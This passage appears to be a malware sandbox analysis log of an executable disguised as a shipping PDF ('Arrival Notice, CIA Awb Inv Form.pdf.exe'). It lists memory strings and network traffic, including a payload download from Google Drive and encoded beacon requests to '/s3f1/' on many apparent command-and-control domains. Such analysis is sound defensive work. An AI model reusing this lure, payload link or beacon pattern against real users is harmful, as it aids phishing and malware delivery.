    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
    Source: explorer.exe, 00000007.00000000.22755704421.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22655480693.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22985193767.000000000D59B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
    Source: explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://s.symcd.com06
    Source: explorer.exe, 00000007.00000000.22975794820.000000000A7C0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22635050466.0000000002FB0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22646529192.0000000009AB0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.micro
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: http://www.foreca.com
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/odirm
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=a
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
    Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivationi
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: https://d.symcb.com/cps0%
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: https://d.symcb.com/rpa0
    Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exeString found in binary or memory: https://d.symcb.com/rpa0.
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816989245.00000000008D8000.00000004.00000020.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/%%doc-14-5s-docs.googleusercontent.com
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt6
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmpString found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/tography
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817051370.00000000008E0000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCB
    Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCh&
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22709261731.00000000109B4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22661302850.00000000109B4000.00000004.00000001.sdmpString found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
    Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com
    Source: explorer.exe, 00000007.00000000.22984417636.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22754900142.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654737060.000000000D4F4000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.office.come
    Source: NETSTAT.EXE, 00000008.00000002.26929375069.00000000039BF000.00000004.00020000.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=e&domain=izivente.com&origin=sales_lander
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://windows.msn.com:443/shell
    Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22727056323.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22956960258.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22632233648.0000000000B94000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpA
    Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
    Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: unknownDNS traffic detected: queries for: drive.google.com
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5s-docs.googleusercontent.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.izivente.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.musee-radix-hairsalon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.teslafreesuperchargermiles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.mvsteals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.thaicharuen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.morningstarapparel.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.soarlikeaneagle.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.evaccines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.celsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1Host: www.4mtechmachines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1Host: www.hara.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2